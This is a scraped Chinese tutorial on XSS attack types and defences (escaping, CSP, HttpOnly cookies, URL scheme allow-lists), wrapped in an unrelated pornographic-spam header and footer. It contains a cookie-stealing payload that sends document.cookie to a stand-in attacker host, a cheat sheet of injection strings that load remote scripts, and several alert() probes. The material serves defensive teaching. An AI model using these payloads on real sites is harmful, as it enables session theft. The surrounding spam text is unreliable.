黄a在线观看-黄a在线-黄a大片-黄色片在线看-黄色毛片免费-黄色大片网站

您的位置:首頁技術(shù)文章
文章詳情頁

java 最新Xss攻擊與防護(hù)(全方位360°詳解)

瀏覽:6日期:2022-08-18 16:27:55
前沿

XSS防范屬于前端還是后端的責(zé)任 ?

XSS 防范是后端 RD(研發(fā)人員)的責(zé)任,后端 RD 應(yīng)該在所有用戶提交數(shù)據(jù)的接口,對(duì)敏感字符進(jìn)行轉(zhuǎn)義,才能進(jìn)行下一步操作。

所有要插入到頁面上的數(shù)據(jù),都要通過一個(gè)敏感字符過濾函數(shù)的轉(zhuǎn)義,過濾掉通用的敏感字符后,就可以插入到頁面中。

公司的搜索頁面如果你是下面的寫法。那么他可能存在Xss注入

<input type='text' value='<%= getParameter('keyword') %>'><button>搜索</button><div> 您搜索的關(guān)鍵詞是:<%= getParameter('keyword') %></div>1. 什么是xss攻擊?

Xss 即(Cross Site Scripting)中文名稱為:跨站腳本攻擊。XSS的重點(diǎn)不在于跨站點(diǎn),而在于腳本的執(zhí)行。

1.1 原理惡意代碼未經(jīng)過濾,與網(wǎng)站正常的代碼混在一起;瀏覽器無法分辨哪些腳本是可信的,導(dǎo)致惡意腳本被執(zhí)行。而由于直接在用戶的終端執(zhí)行,惡意代碼能夠直接獲取用戶的信息,或者利用這些信息冒充用戶向網(wǎng)站發(fā)起攻擊者定義的請(qǐng)求。

1.2 分類Xss攻擊最主要有如下分類:反射型Xss(非持久型)、存儲(chǔ)型Xss(持久型)和DOM Xss。

1.2.1 反射型Xss(了解)

原理反射性xss一般指攻擊者通過特定的方式來誘惑受害者去訪問一個(gè)包含惡意代碼的URL。當(dāng)受害者點(diǎn)擊惡意鏈接url的時(shí)候,惡意代碼會(huì)直接在受害者的主機(jī)上的瀏覽器執(zhí)行。

步驟

攻擊者在url后面的參數(shù)中加入惡意攻擊代碼。 當(dāng)用戶打開帶有惡意代碼的URL的時(shí)候,網(wǎng)站服務(wù)端將惡意代碼從URL中取出,拼接在html中并且返回給瀏覽器端。 用戶瀏覽器接收到響應(yīng)后執(zhí)行解析,其中的惡意代碼也會(huì)被執(zhí)行到。 攻擊者通過惡意代碼來竊取到用戶數(shù)據(jù)并發(fā)送到攻擊者的網(wǎng)站。攻擊者會(huì)獲取到比如cookie等信息,然后使用該信息來冒充合法用戶的行為,調(diào)用目標(biāo)網(wǎng)站接口執(zhí)行攻擊等操作。

演示

<title>csrf攻擊</title><a href='http://localhost:3001/xss' rel='external nofollow' >xxs 攻擊</a><a href='http://localhost:3001/testcookie' rel='external nofollow' >testcookie 攻擊</a>

//第一個(gè)鏈接 可以彈出指定的彈窗router.get(’/xss’, (ctx, next) => { ctx.body = ’<script>alert('反射型 XSS 攻擊')</script>’;});//獲取當(dāng)前的所有cookierouter.get(’/testcookie’, (ctx, next) => { console.log(ctx.cookies.get(’connect.sid’)); ctx.body = ’<script>alert('’+ctx.cookies.get(’connect.sid’)+’')</script>’; next();});

1.2.2 存儲(chǔ)型Xss(了解)原理主要是將惡意代碼上傳或存儲(chǔ)到服務(wù)器中,下次只要受害者瀏覽包含此惡意代碼的頁面就會(huì)執(zhí)行惡意代碼。

場(chǎng)景比如我現(xiàn)在做了一個(gè)博客網(wǎng)站,然后攻擊者在上面發(fā)布了一篇文章,內(nèi)容是如下:<script>window.open('www.gongji.com?param='+document.cookie)</script> 如果我沒有對(duì)該文章進(jìn)行任何處理的話,直接存入到數(shù)據(jù)庫中,那么下一次當(dāng)其他用戶訪問該文章的時(shí)候,服務(wù)器會(huì)從數(shù)據(jù)庫中讀取后然后響應(yīng)給客戶端,那么瀏覽器就會(huì)執(zhí)行這段腳本,然后攻擊者就會(huì)獲取到用戶的cookie,然后會(huì)把cookie發(fā)送到攻擊者的服務(wù)器上了。

步驟

攻擊者將惡意代碼提交到目標(biāo)網(wǎng)站數(shù)據(jù)庫中。 用戶打開目標(biāo)網(wǎng)站時(shí),網(wǎng)站服務(wù)器將惡意代碼從數(shù)據(jù)庫中取出,然后拼接到html中返回給瀏覽器中。 用戶瀏覽器接收到響應(yīng)后解析執(zhí)行,那么其中的惡意代碼也會(huì)被執(zhí)行。 那么惡意代碼執(zhí)行后,就能獲取到用戶數(shù)據(jù),比如上面的cookie等信息,那么把該cookie發(fā)送到攻擊者網(wǎng)站中,那么攻擊者拿到該

cookie然后會(huì)冒充該用戶的行為,調(diào)用目標(biāo)網(wǎng)站接口等違法操作。

1.2.3 DOM-based型Xss(了解)

原理我們客戶端的js可以對(duì)頁面dom節(jié)點(diǎn)進(jìn)行動(dòng)態(tài)的操作,比如插入、修改頁面的內(nèi)容。比如說客戶端從URL中提取數(shù)據(jù)并且在本地執(zhí)行、如果用戶在客戶端輸入的數(shù)據(jù)包含了惡意的js腳本的話,但是這些腳本又沒有做任何過濾處理的話,那么我們的應(yīng)用程序就有可能受到DOM-based Xss的攻擊。

步驟

攻擊者構(gòu)造出特殊的URL、在其中可能包含惡意代碼。 用戶打開帶有惡意代碼的URL。 用戶瀏覽器收到響應(yīng)后解析執(zhí)行。前端使用js取出url中的惡意代碼并執(zhí)行。 執(zhí)行時(shí),惡意代碼竊取用戶數(shù)據(jù)并發(fā)送到攻擊者的網(wǎng)站中,那么攻擊者網(wǎng)站拿到這些數(shù)據(jù)去冒充用戶的行為操作。調(diào)用目標(biāo)網(wǎng)站接口

執(zhí)行攻擊者一些操作。

攻擊代碼

使用document.write直接輸出導(dǎo)致瀏覽器解析惡意代碼 使用innerHTML直接輸出導(dǎo)致瀏覽器解析惡意代碼 使用location/location.href/location.replace/iframe.src 造成的XSS

<script type='text/javascript'> var s = location.search; // 返回URL中的查詢部分(?之后的內(nèi)容) // 為了方便演示,我們假如url是 如下這樣的 // http://127.0.0.1/xsstest.html?url=javascript:alert(’xsstest’); // 然后我們的是 s 的值就為如下: s = '?url=javascript:alert(’xsstest’)'; s = s.substring(1, s.length); // 返回整個(gè)查詢內(nèi)容 var url = ''; // 定義變量url if (s.indexOf('url=') > -1) { // 判斷URL是否為空 var pos = s.indexOf('url=') + 4; // 過濾掉'url='字符 url = s.substring(pos, s.length); // 得到地址欄里的url參數(shù) } else { url = 'url參數(shù)為空'; } document.write(’url: <a href='http://m.propowerdrill.cn/bcjs/’ + url + ’' rel='external nofollow' >'’ + url + ’'</a>’); </script>2. Xss有什么危害?

2.1 劫持訪問

劫持訪問就是在惡意腳本中插入諸如的代碼,那么頁面就會(huì)跳轉(zhuǎn)到百度首頁.像http://qq.com這樣的域名下出現(xiàn)...,那么在發(fā)送釣魚鏈接時(shí)就可以通過http://qq.com等域名進(jìn)行跳轉(zhuǎn),一般人一看到http://qq.com之類的域名警惕性會(huì)下降,也就更容易上當(dāng)了。

2.2 盜用cookie實(shí)現(xiàn)無密碼登錄由于盜取的cookie需要傳回給攻擊者,因此往往需要一個(gè)服務(wù)器來接收盜取的cookie。

2.3 配合csrf攻擊完成惡意請(qǐng)求Csrf攻擊就是在未經(jīng)你許可的情況下用你的名義發(fā)送惡意請(qǐng)求(比如修改密碼,銀行轉(zhuǎn)賬等)

2.4 其他危害DOS(拒絕服務(wù))客戶端瀏覽器。掛馬劫持用戶Web行為,甚至進(jìn)一步滲透內(nèi)網(wǎng)。刪除目標(biāo)文章、惡意篡改數(shù)據(jù)、嫁禍。蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網(wǎng)上數(shù)據(jù)蠕蟲式的DDoS攻擊。

3. 防范手段

3.1 兩大要素XSS 攻擊有兩大要素:

攻擊者提交惡意代碼(輸入過濾)。 瀏覽器執(zhí)行惡意代碼。

xss攻擊要能達(dá)成往往需要較長的字符串,因此對(duì)于一些可以預(yù)期的輸入可以通過限制長度強(qiáng)制截?cái)鄟磉M(jìn)行防御。

3.2 預(yù)防方案

3.2.1 輸入過濾

對(duì)輸入的內(nèi)容諸如<script>、<img>等標(biāo)簽進(jìn)行過濾 其次是編碼。像一些常見的符號(hào),如<>在輸入的時(shí)候要對(duì)其進(jìn)行轉(zhuǎn)換編碼,這樣做瀏覽器是不會(huì)對(duì)該標(biāo)簽進(jìn)行解釋執(zhí)行的,同時(shí)也不影響顯示效果。

3.2.2 預(yù)防存儲(chǔ)型和反射型 Xss 攻擊預(yù)防這兩種漏洞,有兩種常見做法:

改成純前端渲染,把代碼和數(shù)據(jù)分隔開。 對(duì) HTML 做充分轉(zhuǎn)義。

3.2.2.1 純前端渲染純前端渲染的過程:

瀏覽器先加載一個(gè)靜態(tài) HTML,此 HTML 中不包含任何跟業(yè)務(wù)相關(guān)的數(shù)據(jù)。 然后瀏覽器執(zhí)行 HTML 中的 JavaScript。 JavaScript 通過 Ajax 加載業(yè)務(wù)數(shù)據(jù),調(diào)用 DOM API 更新到頁面上。

3.2.2.2 轉(zhuǎn)義 HTML如果拼接 HTML 是必要的,就需要采用合適的轉(zhuǎn)義庫,對(duì) HTML 模板各處插入點(diǎn)進(jìn)行充分的轉(zhuǎn)義。

對(duì)于 HTML 轉(zhuǎn)義通常只有一個(gè)規(guī)則,就是把 & < > ' ’ / 這幾個(gè)字符轉(zhuǎn)義掉,確實(shí)能起到一定的 XSS 防護(hù)作用,但并不完善:

所以要完善 Xss 防護(hù)措施,我們要使用更完善更細(xì)致的轉(zhuǎn)義策略。

例如 Java 工程里,常用的轉(zhuǎn)義庫為 org.owasp.encoder

3.2.3 輸入內(nèi)容長度控制對(duì)于不受信任的輸入,都應(yīng)該限定一個(gè)合理的長度。雖然無法完全防止 Xss 發(fā)生,但可以增加 Xss 攻擊的難度。

對(duì)于明確的輸入類型,例如數(shù)字、URL、電話號(hào)碼、郵件地址等等內(nèi)容,進(jìn)行輸入過濾還是必要的。

3.2.4 Cookie的安全設(shè)置

HTTP-only Cookie: 禁止 JavaScript 讀取某些敏感 Cookie,攻擊者完成 XSS 注入后也無法竊取此 Cookie。

http-only: 只允許http或https請(qǐng)求讀取cookie、JS代碼是無法讀取cookie的(document.cookie會(huì)顯示http-only的cookie項(xiàng)被自動(dòng)過濾掉)。發(fā)送請(qǐng)求時(shí)自動(dòng)發(fā)送cookie. secure-only: 只允許https請(qǐng)求讀取,發(fā)送請(qǐng)求時(shí)自動(dòng)發(fā)送cookie。 host-only: 只允許主機(jī)域名與domain設(shè)置完成一致的網(wǎng)站才能訪問該cookie。

3.2.5 安全驗(yàn)證驗(yàn)證碼:防止腳本冒充用戶提交危險(xiǎn)操作。

3.2.6 開啟CSP網(wǎng)頁安全政策Content-Security-Policy 中文的意思是 網(wǎng)頁安全政策,

CSP是網(wǎng)頁安全政策(Content Security Policy)的縮寫。主要用來防止Xss攻擊。是一種由開發(fā)者定義的安全性政策申明,通過CSP所約束的責(zé)任指定可信的內(nèi)容來源,通過 Content-Security-Policy 網(wǎng)頁的開發(fā)者可以控制整個(gè)頁面中 外部資源 的加載和執(zhí)行。比如可以控制哪些 域名下的靜態(tài)資源可以被頁面加載,哪些不能被加載。這樣就可以很大程度的防范了 來自 跨站(域名不同) 的腳本攻擊

我們只需要在meta屬性中設(shè)置下即可:如下代碼:

<meta http-equiv='Content-Security-Policy' content='default-src http: https: *.xxx.com ’self’ ’unsafe-inline’ ;style-src ’self’ ’unsafe-inline’ *.yyy.com;script-src ’self’ ’unsafe-inline’ ’unsafe-eval’ ;'> default-src 給下面所有的規(guī)則設(shè)定一個(gè)默認(rèn)值 script-src 外部腳本 style-src 樣式表 img-src 圖像 media-src 媒體文件(音頻和視頻) font-src 字體文件 object-src 插件(比如 Flash) child-src 框架 3.2.7 避免內(nèi)聯(lián)事件

避免內(nèi)聯(lián)事件 盡量不要使用 onLoad='onload(’{{data}}’)'、onClick='go(’{{action}}’)' 這種拼接內(nèi)聯(lián)事件的寫法。在 JavaScript 中通過 .addEventlistener() 事件綁定會(huì)更安全。

4. 總結(jié)

整體的 XSS 防范是非常復(fù)雜和繁瑣的,我們不僅需要在全部需要轉(zhuǎn)義的位置,對(duì)數(shù)據(jù)進(jìn)行對(duì)應(yīng)的轉(zhuǎn)義。而且要防止多余和錯(cuò)誤的轉(zhuǎn)義,避免正常的用戶輸入出現(xiàn)亂碼。

雖然很難通過技術(shù)手段完全避免 XSS,但我們可以總結(jié)以下原則減少漏洞的產(chǎn)生:

利用模板引擎 開啟模板引擎自帶的 HTML 轉(zhuǎn)義功能。例如: 在 ejs 中,盡量使用 <%= data %> 而不是 <%- data %>; 在 doT.js 中,盡量使用 {{! data } 而不是 {{= data }; 在 FreeMarker 中,確保引擎版本高于 2.3.24,并且選擇正確的 freemarker.core.OutputFormat。 避免內(nèi)聯(lián)事件 盡量不要使用 onLoad='onload(’{{data}}’)'、onClick='go(’{{action}}’)' 這種拼接內(nèi)聯(lián)事件的寫法。在 JavaScript 中通過 .addEventlistener() 事件綁定會(huì)更安全。 避免拼接 HTML 前端采用拼接 HTML 的方法比較危險(xiǎn),如果框架允許,使用 createElement、setAttribute 之類的方法實(shí)現(xiàn)?;蛘卟捎帽容^成熟的渲染框架,如 Vue/React 等。 時(shí)刻保持警惕 在插入位置為 DOM 屬性、鏈接等位置時(shí),要打起精神,嚴(yán)加防范。 增加攻擊難度,降低攻擊后果 通過 CSP、輸入長度配置、接口安全措施等方法,增加攻擊的難度,降低攻擊的后果。 主動(dòng)檢測(cè)和發(fā)現(xiàn) 可使用 XSS 攻擊字符串和自動(dòng)掃描工具尋找潛在的 XSS 漏洞。5. 真實(shí)場(chǎng)景(搜索場(chǎng)景)

某天,公司需要一個(gè)搜索頁面,根據(jù) URL 參數(shù)決定關(guān)鍵詞的內(nèi)容

1. 原始版本

<input type='text' value='<%= getParameter('keyword') %>'><button>搜索</button><div> 您搜索的關(guān)鍵詞是:<%= getParameter('keyword') %></div>

當(dāng)執(zhí)行 http://xxx/search?keyword='><script>alert(’XSS’);</script>,服務(wù)端會(huì)解析出請(qǐng)求參數(shù) keyword,得到 '><script>alert(’XSS’);</script>,拼接到 HTML 中返回給瀏覽器,頁面就出現(xiàn)如下內(nèi)容,alert 會(huì)彈出兩次。

<input type='text' value=''><script>alert(’XSS’);</script>'><button>搜索</button><div> 您搜索的關(guān)鍵詞是:'><script>alert(’XSS’);</script></div>

2. Xss的轉(zhuǎn)義攻擊

<input type='text' value='<%= escapeHTML(getParameter('keyword')) %>'><button>搜索</button><div> 您搜索的關(guān)鍵詞是:<%= escapeHTML(getParameter('keyword')) %></div>

escapeHTML() 按照如下規(guī)則進(jìn)行轉(zhuǎn)義:|字符|轉(zhuǎn)義后的字符| |-|-| |&|&| |<|<| |>|>| |'|'| |’|’| |/|/|

經(jīng)過了轉(zhuǎn)義函數(shù)的處理后,最終瀏覽器接收到的響應(yīng)為:

<input type='text' value='&quot;&gt;&lt;script&gt;alert(&#x27;XSS&#x27;);&lt;&#x2F;script&gt;'><button>搜索</button><div> 您搜索的關(guān)鍵詞是:&quot;&gt;&lt;script&gt;alert(&#x27;XSS&#x27;);&lt;&#x2F;script&gt;</div>

小結(jié)論

通常頁面中包含的用戶輸入內(nèi)容都在固定的容器或者屬性內(nèi),以文本的形式展示。 攻擊者利用這些頁面的用戶輸入片段,拼接特殊格式的字符串,突破原有位置的限制,形成了代碼片段。 攻擊者通過在目標(biāo)網(wǎng)站上注入腳本,使之在用戶的瀏覽器上運(yùn)行,從而引發(fā)潛在風(fēng)險(xiǎn)。 通過 HTML 轉(zhuǎn)義,可以防止 XSS 攻擊。。

3. Xss過濾攻擊

當(dāng)請(qǐng)求為: http://xxx/?redirect_to=javascript:alert(’XSS’) 時(shí)

<a href='http://m.propowerdrill.cn/bcjs/<%= escapeHTML(getParameter(' rel='external nofollow' rel='external nofollow' rel='external nofollow' redirect_to')) %>'>跳轉(zhuǎn)...</a>

當(dāng)攻擊 URL 為 http://xxx/?redirect_to=javascript:alert(’XSS’),服務(wù)端響應(yīng)就成了:

<a href='javascript:alert(&#x27;XSS&#x27;)' rel='external nofollow' >跳轉(zhuǎn)...</a>

雖然代碼不會(huì)立即執(zhí)行,但一旦用戶點(diǎn)擊 a 標(biāo)簽時(shí),瀏覽器會(huì)就會(huì)彈出“XSS”。

解決方案 過濾

// 禁止 URL 以 'javascript:' 開頭xss = getParameter('redirect_to').startsWith(’javascript:’);if (!xss) { <a href='http://m.propowerdrill.cn/bcjs/<%= escapeHTML(getParameter(' rel='external nofollow' rel='external nofollow' rel='external nofollow' redirect_to'))%>'> 跳轉(zhuǎn)... </a>} else { <a href='http://m.propowerdrill.cn/404' rel='external nofollow' rel='external nofollow' > 跳轉(zhuǎn)... </a>}

4. Xss的大小寫攻擊當(dāng)請(qǐng)求為:http://xxx/?redirect_to=%20javascript:alert(’XSS’) 時(shí)

%20javascript:alert(’XSS’) 經(jīng)過 URL 解析后變成 javascript:alert(’XSS’),這個(gè)字符串以空格開頭。這樣攻擊者可以繞過后端的關(guān)鍵詞規(guī)則,又成功的完成了注入。

解決方案 白名單

// 根據(jù)項(xiàng)目情況進(jìn)行過濾,禁止掉 'javascript:' 鏈接、非法 scheme 等allowSchemes = ['http', 'https'];valid = isValid(getParameter('redirect_to'), allowSchemes);if (valid) { <a href='http://m.propowerdrill.cn/bcjs/<%= escapeHTML(getParameter(' rel='external nofollow' rel='external nofollow' rel='external nofollow' redirect_to'))%>'> 跳轉(zhuǎn)... </a>} else { <a href='http://m.propowerdrill.cn/404' rel='external nofollow' rel='external nofollow' > 跳轉(zhuǎn)... </a>}

大結(jié)論

在 HTML 中內(nèi)嵌的文本中,惡意內(nèi)容以 script 標(biāo)簽形成注入。 在內(nèi)聯(lián)的 JavaScript 中,拼接的數(shù)據(jù)突破了原本的限制(字符串,變量,方法名等)。 在標(biāo)簽屬性中,惡意內(nèi)容包含引號(hào),從而突破屬性值的限制,注入其他屬性或者標(biāo)簽。 在標(biāo)簽的 href、src 等屬性中,包含 javascript: 等可執(zhí)行代碼。 在 onload、onerror、onclick 等事件中,注入不受控制代碼。 在 style 屬性和標(biāo)簽中,包含類似 background-image:url('javascript:...'); 的代碼(新版本瀏覽器已經(jīng)可以防范)。 在 style 屬性和標(biāo)簽中,包含類似 expression(...) 的 CSS 表達(dá)式代碼(新版本瀏覽器已經(jīng)可以防范)。

總之,如果開發(fā)者沒有將用戶輸入的文本進(jìn)行合適的過濾,就貿(mào)然插入到 HTML 中,這很容易造成注入漏洞。攻擊者可以利用漏洞,構(gòu)造出惡意的代碼指令,進(jìn)而利用惡意代碼危害數(shù)據(jù)安全。

6. 附常見的XSS攻擊方法

JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

IMG標(biāo)簽XSS

<IMG SRC=http://3w.org/XSS/xss.js/>

IMG標(biāo)簽無分號(hào)無引號(hào)

<IMG SRC=javascript:alert(’XSS’)>

HTML編碼(必須有分號(hào))

<IMG SRC=javascript:alert('XSS')>

換碼過濾的JavaScript

';alert(’XSS’);//

結(jié)束Title標(biāo)簽

</TITLE><SCRIPT>alert('XSS');</SCRIPT>

Iframe

<IFRAME data-src='javascript:alert(’XSS’);'></IFRAME>

DIV background-image

<DIV STYLE='background-image: url(javascript:alert(’XSS’))'>

節(jié)省[http:]

<A rel='external nofollow' >XSS</A>

到此這篇關(guān)于java 最新Xss攻擊與防護(hù)(全方位360°詳解)的文章就介紹到這了,更多相關(guān)java Xss攻擊防護(hù)內(nèi)容請(qǐng)搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)!

標(biāo)簽: Java
相關(guān)文章:
主站蜘蛛池模板: 亚洲精品视频一区二区三区 | 在线 日本 制服 中文 欧美 | 国产精品成人无码久久久 | 美女视频黄的免费 | 亚洲综合欧美在线一区在线播放 | 午夜精品久久99蜜桃的功能介绍 | 国产a级精品毛片 | 欧美皮鞭调教wwwcom | 国产在线国偷精品产拍 | 精品国产免费一区二区三区香蕉 | 日韩欧美黄色 | 91在线视频免费 | 国产精品一区二区在线观看 | 91精品啪在线观看国产手机 | 久久zyz资源站无码中文动漫 | 欧美日韩国产一区 | 永久免费视频 国产 | hd日本xxxx | 亚洲欧洲中文字幕 | 精品国产乱码一区二区 | 免费成人高清视频 | 天堂网2021天堂手机版 | 免费看黄色一级视频 | 青草福利视频 | 免费观看av毛片 | 亚洲综合欧美在线一区在线播放 | 欧美日韩国产亚洲沙发 | 樱桃成人精品视频在线播放 | 日韩卡一卡二 | 国产麻豆精品久久一二三 | 国偷自产视频一区二区久 | av男人的天堂在线观看国产 | 国产又粗又硬又大爽黄老大爷视 | 欧美自拍另类欧美综合图片区 | 美女视频黄的全免费视频网站 | 亚洲成人生活片 | 性做久久久久久久免费看 | 青草内射中出高潮 | 国产深夜福利视频在线 | 亚洲欧美日本国产高清 | www.精品在线 | 欧美在线激情 | 三级国产三级在线 | 古代黄色一级片 | 6080影视最新97理伦片 | 中文字幕人成乱码在线观看 | 久久久精品 | 国产一区二区三区不卡在线观看 | 午夜精品久久久久久久白皮肤 | 狠狠躁18三区二区一区ai明星 | 黄页网址大全免费观看 | 中文字幕无码免费久久 | 免费在线观看黄色网址 | 日韩精品一区二区三区四区视频 | 精品水蜜桃久久久久久久 | 成人性生交片无码免费看 | 新国产三级在线观看播放 | 台湾swag在线播放 | 国产视频欧美 | 五月天激情婷婷婷久久 | 男女一级黄色 | www视频在线观看网站 | 19禁大尺度做爰无遮挡小说 | 久久午夜激情 | 午夜国产精品国产自线拍免费人妖 | www五月天com | 国内自拍小视频 | 五十路毛片 | 成人精品一区二区户外勾搭野战 | 亚洲另类春色校园小说 | 国产亚洲精品一区二区三区 | 西西毛片| 女同久久另类69精品国产 | av不卡在线观看 | 久久午夜鲁丝片 | 激情综合五月 | 亚洲国产综合色产精品色在线 | 国产日韩欧美 | 欧美大浪妇猛交饥渴大叫 | 懂色中文一区二区三区在线视频 | 亚洲久草| 日韩欧美一本 | 屁屁国产草草影院ccyycom | 绿帽h啪肉np辣文 | 女同重口另类在线观看 | 色性av| 大岛优香中文av在线字幕 | 无码国产一区二区三区四区 | 亚洲aaa毛片 | 美女少妇毛片 | 成年人免费高清视频 | 99热偷拍 | 国产精品偷伦费观看一次 | 国产高清无套内谢 | 国产91对白在线观看九色 | 免费的色视频 | 亚洲欧美一区二区三区在线 | 六月丁香激情 | 91av大片| av亚洲在线观看 | 超碰人人人人人人 | 婷婷丁香九月 | 欧美性受视频 | 久久视频精品在线 | 精品久久久久久成人av | 国内揄拍国内精品 | 亚洲精品一区在线 | 国产伦精品一区三区视频 | 出轨人妻毛片一级 | 亚洲的天堂av无码 | 日本特黄特色大片免费视频老年人 | 91免费看国产 | 久久国产三级 | 在线观看三级视频 | 国产视频第三页 | 日本美女日批视频 | 日本中文字幕一区二区 | 美女内射毛片在线看免费人动物 | 少妇一区二区三区四区 | 5566亚洲精华国产精华精华液 | 成人啪啪色婷婷久 | 亚洲精品毛片一区二区三区 | 国产经典盗摄91区x99av | 无遮挡国产| aaa人片在线| 欧美国产亚洲日韩在线二区 | 久久国产小视频 | 成人福利视频导航 | av黄色毛片 | 国产女人呻吟高潮抽搐声 | 黄色大片黄色大片 | japanese日本精品少妇 | 2019自拍偷拍 | 蜜桃传媒一区二区亚洲 | 国产交换配乱淫视频α | 成在人线av| 日韩欧美影院 | 伊人久久大香线蕉综合网站 | av在线播放中文字幕 | 精品久久中文字幕97 | 日本极品xnxxcom | 免费做a爰片77777 | 美女啪啪网站又黄又免费 | 欧美午夜精品久久久久久蜜 | 999在线观看视频 | 久久亚洲一区二区三区四区 | 亚洲女人的天堂 | frxxee欧美xxee麻豆 | 精品福利影院 | 噜噜啪啪 | 全程穿着高跟鞋做爰av | 夜夜6699ww爽爽婷婷 | 91精品视频免费观看 | 国产猛男猛女超爽免费视频 | 91亚洲人人在字幕国产 | 欧美15一16性娇小高清 | 亚洲七七久久桃花影院 | yiren22亚洲综合伊人22 | 国产精品偷伦视频免费观看了 | 色多多黄色 | 天天福利视频 | 天堂岛av | 精品国产免费一区二区三区香蕉 | 永久国产 | 黄色a级网站| 国产精品人妻在线观看 | 欧美精品久久久久久久免费 | 成年人免费看的视频 | 欧美性插b在线视频网站 | 欧美日韩人成综合在线播放 | 伊人22综合| 国产99免费| 韩产日产国产欧产 | 久久看av| 超碰成人免费 | 啪啪导航 | 伊人久久影院 | 天堂av在线资源 | 国产成人激情视频 | 天天干天天日夜夜操 | 国产网站在线 | 久久久精品久久久久久 | 波多野结衣aⅴ在线 | 亚洲精品乱码久久久久久麻豆不卡 | 天天爽夜夜爽精品视频婷婷 | 日韩视频中文字幕在线观看 | 国产乱人伦精品一区二区三区 | 中文字幕精品无码一区二区三区 | 国产精品国语对白 | 性裸体bbwbbwbbwbbw | 婷婷久久久久久 | 成人福利视频一区二区 | 毛片在哪里看 | 日韩加勒比一本无码精品 | 欧洲丰满少妇做爰 | 密臀av夜夜澡人人爽人人 | 久久久久久久久免费 | 国产乱子伦精品视频 | 欧美日韩精品人妻狠狠躁免费视频 | 免费一区二区三区视频在线 | 国产一级免费av | 中文字幕久热精品视频在线 | 久久久老司机 | 一区二区国产视频 | 日韩黄色录像 | 波多野结衣av在线播放 | 女人张开腿让男人桶爽 | 日本草草视频 | 一女两夫做爰3p高h文 | 秋霞亚洲 | 成人区精品一区二区婷婷 | 欧美日韩一级黄色片 | 丰满爆乳无码一区二区三区 | 极品少妇被黑人白浆直流 | 亚洲成aⅴ人片久青草影院 亚洲无av码一区二区三区 | 国产精品对白刺激 | 亚洲中文字幕无码av | 欧美激情猛片xxxⅹ大3 | 国产一区二区三区四区三区 | 伊人久久久久久久久久久久 | 免费观看日本污污ww网站 | 日韩av免费| 青青草成人免费在线视频 | 性欢交69国产精品 | 亚洲黄色免费看 | 伊人夜夜 | 日韩精品乱码av一区二区 | 成人福利网 | 国产欧美综合一区 | 台湾佬成人中娱网222vvvv | 国产又色又爽又黄刺激视频免费 | 97超碰在线免费观看 | 成人mv在线观看 | 欧美女同视频 | 日韩精品―中文字幕 | 国产精品第12页 | 99免费在线 | 欧美亚洲日韩国产人成在线播放 | 99精品偷拍视频一区二区三区 | 天天看天天射 | 国产日产欧产精品精乱了派 | 男人的天堂免费av | 久久久国产乱子伦精品作者 | 黄色一级a毛片 | 中国字幕av | 韩国少妇xxxx搡xxxx搡 | 44382亚洲最大成人网 | 亚洲人成无码网站久久99热国产 | 国产另类ts人妖一区二区 | 久久午夜国产精品www忘忧草 | 欧美xxxx黑人又粗又长精品 | 中文无码精品a∨在线观看不卡 | 国产福利精品在线 | 91九色精品 | 国产一级做a爱片在线看免 国产一级做a爰片久久毛片男 | 成人免费网站黄 | 成人做爰69片免网站 | 91精品国产777在线观看 | 久久久综合九色合综 | 婷婷黄色网 | 夜夜嗨一区二区 | 蜜桃av噜噜一区二区三区 | 亚洲国产精品成人午夜在线观看 | 国产激情综合五月久久 | 少妇在线观看888视频 | 国产在线视频一区二区三区 | 午夜精品久久久久久久白皮肤 | 国产精品二区视频 | 日韩一区二区精品视频 | 性色av蜜臀av色欲av | 免费av免费观看 | 人人干av | 国产精品日日做人人爱 | 日本三级网站在线观看 | 福利姬液液酱喷水 | 毛片毛片毛片毛片毛片毛片 | 亚洲第一国产 | √天堂中文官网8在线 | 久久精品视频一区二区 | 日本xxx高清 | 成熟少妇一区二区三区 | 神马久久久久 | 日韩欧美久久精品 | 亚洲综合影视 | 永久免费看毛片 | 香蕉人人超人人超碰超国产 | 成人国产欧美日韩在线视频 | 国产高清av | 夜夜爽网站 | 欧美精品一级二级三级 | 国产精品igao视频网免费播放 | 日韩av在线看 | 99re66热这里只有精品8 | 精精国产xxxx视频在线 | 日本又黄又猛又爽免费视频 | 俄罗斯大bbbwww视频 | 国产一区二三区好的精华液69 | 久久精品亚洲精品国产欧美kt∨ | 久久免费视频5 | 伊人久久大香线蕉av色婷婷色 | 女人爽到高潮免费视频大全 | 亚洲深夜av | 狠狠干网址 | 免费全黄无遮挡裸体毛片 | 成人免费一区二区 | 伊人久久大香线蕉av色婷婷色 | 人妖精品videosex性欧美 | 久久免费播放视频 | 久久天天躁狠狠躁夜夜av | 91九色蝌蚪 | 久久精品99国产精品亚洲 | 久久精品99久久香蕉国产色戒 | 97久久精品人人做人人爽50路 | 亚洲欧美日韩国产精品一区午夜 | 日韩狠狠 | 91精产国品一二三产区区别网站 | 国产麻豆乱码精品一区二区三区 | 97精品一区二区视频在线观看 | 色婷婷综合成人 | 成人激情免费 | 国内精品久久久久久久久 | 99re8这里有精品热视频免费 | 老子影院午夜伦不卡大全 | 肉体公尝中文字幕第三部 | 韩国美女啪啪 | 精品国产一区二区三区不卡蜜臂 | 国产无遮挡aaa片爽爽 | 毛片无遮挡高清免费 | 国产欧美日韩中文久久 | 性生活网址 | 精品熟人妻一区二区三区四区不卡 | 久久精品国产亚卅av嘿嘿 | 男女无遮挡做爰猛烈视频 | 草草夜色精品国产噜噜竹菊 | 人与禽交av在线播放 | 久久精品成人免费国产片桃视频 | 2020久久超碰国产精品最新 | 国产三区二区 | av生活片 | 亚洲国产精品激情综合图片 | 亚洲中文无码a∨在线观看 在线不卡日本v二区到六区 | 9l视频自拍九色9l视频成人 | 一进一出一爽又粗又大 | 亚洲天堂国产精品 | 日韩娇小xxxxhd | 免费黄色视屏 | 国产九区| 91香蕉嫩草 | 日本一级大全 | 国产欧美一区二区三区鸳鸯浴 | 青青青视频在线播放 | 日韩一级伦理片 | 手机在线一区 | 99热这里只有精品5 99热这里只有精品9 | 欧美中文字幕一区二区三区 | 国产精品青草综合久久久久99 | 久久五月综合 | 国产成人久久精品麻豆二区 | 成人性生交大片免费网站 | 欧美性另类 | 爱情岛论坛亚洲自拍 | 亚洲人xxxx | 国产91综合 | 精品综合网 | 久久久久久久蜜桃 | 涩涩屋www视频在线观看高清 | 男人的天堂a在线 | 